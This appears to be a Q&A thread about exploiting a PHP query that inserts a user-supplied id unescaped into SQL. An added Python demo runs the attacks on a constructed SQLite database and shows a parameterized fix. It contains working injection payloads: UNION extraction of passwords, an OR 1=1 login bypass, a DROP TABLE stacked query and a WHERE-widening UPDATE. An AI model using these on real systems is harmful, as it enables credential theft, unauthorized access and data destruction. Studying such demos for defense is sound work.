
This is a follow-up to this question: Is PHP's addslashes vulnerable to sql injection attack? (thanks to everyone that replied over there).

Same scenario, but I have this code (in another page):

             // user-controlled value, used unescaped in the query string
             $ID = $_GET['id'];
             $sql = "SELECT * FROM blog WHERE id='$ID'";
             $result = mysql_query($sql);

This should be easy enough to exploit, right?

If I remember correctly I CANNOT run a second query inside mysql_query() but I should be able to do some other malicious stuff, right? Would love to be able to insert a user into the admin table or change a password or something, but I assume I wouldn't be able to do anything other than touch the blog table. Is that correct? Any suggestions on how I can play around and tweak something to prove that there are concerns?

  • Please avoid extraneous references to other questions. Commented Dec 1, 2011 at 11:58
  • @Marco - "mysql_query() sends a unique query (multiple queries are not supported)" (source: php.net/manual/en/function.mysql-query.php) Commented Dec 1, 2011 at 11:59
  • Some (93!) interesting slides on Advanced SQL Injection on Slideshare. Commented Dec 1, 2011 at 12:06
  • This question smells. We have no proof that it is actually a security audit (performed by someone who has no idea about security at all). Commented Dec 1, 2011 at 12:57
  • @col - That's the exact reason I am here asking you guys. I haven't done a security audit before, though I have done web development, and I have a client that has asked me to update their site with best practices. Their request was that I show them a vulnerability. I did a bunch of Google research but was unable to come up with anything that would prove my point. You guys gave me enough to do what I needed to do though, and I appreciate that. Commented Dec 1, 2011 at 13:04

2 Answers


It's called UNION and allows you to pull from extra tables by using a second query.

I'm guessing something like 1' UNION ALL SELECT username title, password body FROM users WHERE '1'='1 would work. (pulls from the users table and maps the username and password values to their blog "equivalents").


1 Comment

UNION definitely helped. I was unsure of the construct in this scenario, but I appreciate the nudge in the right direction.

I don't think anyone would think you're trying to hack someone - this is a legitimate question.

You can't run a second query here, but you could do something malicious. For example if the query were an authentication query like so:

SELECT * FROM `users` WHERE `username` = '$username' AND `password` = '$password';

You could quite easily log in with ' OR 1 = 1 and gain access to the website.

Also, if the query was a DELETE or UPDATE query you could probably manipulate it to run without a WHERE clause.

4 Comments

Actually, you can run a second query.
"mysql_query() sends a unique query (multiple queries are not supported)" (source: php.net/manual/en/function.mysql-query.php). If that's wrong, forgive me for going by what the PHP manual says.
You can use UNION - it's a SQL thing that allows you to execute multiple queries.
Ah, I didn't realise you counted that as a second query. I was talking about the classic SQL injection attack which most libraries make redundant now, in which you log in to a site with '; DROP TABLE users; --
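The points raised in both answers and in the comment thread above (UNION-based exfiltration through a single statement, the stacked-query payload that a one-statement API refuses, the authentication bypass, and an UPDATE whose WHERE clause is widened) can be reproduced end to end. The script below is an added example and is not code from the original question or answers. It is Python on an in-memory SQLite database rather than PHP against MySQL: the table names, columns and rows are constructed for the demonstration, and sqlite3's execute() is used as a stand-in for mysql_query() because both accept exactly one statement per call. The payloads chosen are ones that parse the same way in MySQL and SQLite.

```python
import sqlite3

# Constructed sample schema (not from the original page): a public "blog"
# table and a sensitive "users" table in the same database.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE blog (id INTEGER, title TEXT, body TEXT);
        INSERT INTO blog VALUES (1, 'Hello', 'first post'), (2, 'Second', 'more text');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
    """)
    return db

def vulnerable_blog_lookup(db, user_input):
    """Mirrors the PHP in the question: the id value is pasted into the SQL
    string. execute() runs one statement only, like mysql_query()."""
    sql = f"SELECT * FROM blog WHERE id='{user_input}'"
    return db.execute(sql).fetchall()

def safe_blog_lookup(db, user_input):
    """Parameterized form: the value is bound, never parsed as SQL."""
    return db.execute("SELECT * FROM blog WHERE id=?", (user_input,)).fetchall()

def vulnerable_login(db, username, password):
    """Mirrors the authentication query from the second answer."""
    sql = (f"SELECT * FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchall()

def vulnerable_update_title(db, new_title, user_id):
    """An UPDATE whose WHERE clause is built from user input."""
    db.execute(f"UPDATE blog SET title='{new_title}' WHERE id='{user_id}'")
    return db.execute("SELECT id, title FROM blog ORDER BY id").fetchall()

def run_demo():
    db = make_db()
    results = {}

    # Normal use of the blog lookup.
    results["normal"] = vulnerable_blog_lookup(db, "1")

    # UNION exfiltration (first answer). blog has three columns, so the
    # injected SELECT must return three as well; the trailing '1'='1
    # absorbs the closing quote that the original query appends.
    union_payload = "0' UNION ALL SELECT id, username, password FROM users WHERE '1'='1"
    results["union"] = vulnerable_blog_lookup(db, union_payload)

    # Stacked query (from the comment thread). A single-statement API
    # refuses the second statement, so this route is closed here.
    try:
        vulnerable_blog_lookup(db, "1'; DROP TABLE users; --")
        results["stacked"] = "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        results["stacked"] = "rejected"

    # Authentication bypass (second answer). Injecting into the password
    # field makes the WHERE clause (username=... AND password='') OR true,
    # which matches every row because AND binds tighter than OR.
    results["login_bypass"] = vulnerable_login(db, "nobody", "' OR '1'='1")

    # The parameterized version treats the UNION payload as a literal id.
    results["safe_union"] = safe_blog_lookup(db, union_payload)
    results["safe_normal"] = safe_blog_lookup(db, "1")

    # UPDATE with a widened WHERE clause (second answer): every row changes.
    results["update_all"] = vulnerable_update_title(db, "pwned", "1' OR '1'='1")
    return results

if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The UNION branch is the one that answers the question as asked: one statement is enough to read any table the database user can SELECT from, with the column count of the injected SELECT matched to the original query. On MySQL the same payloads apply; only the stacked-query rejection message differs.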
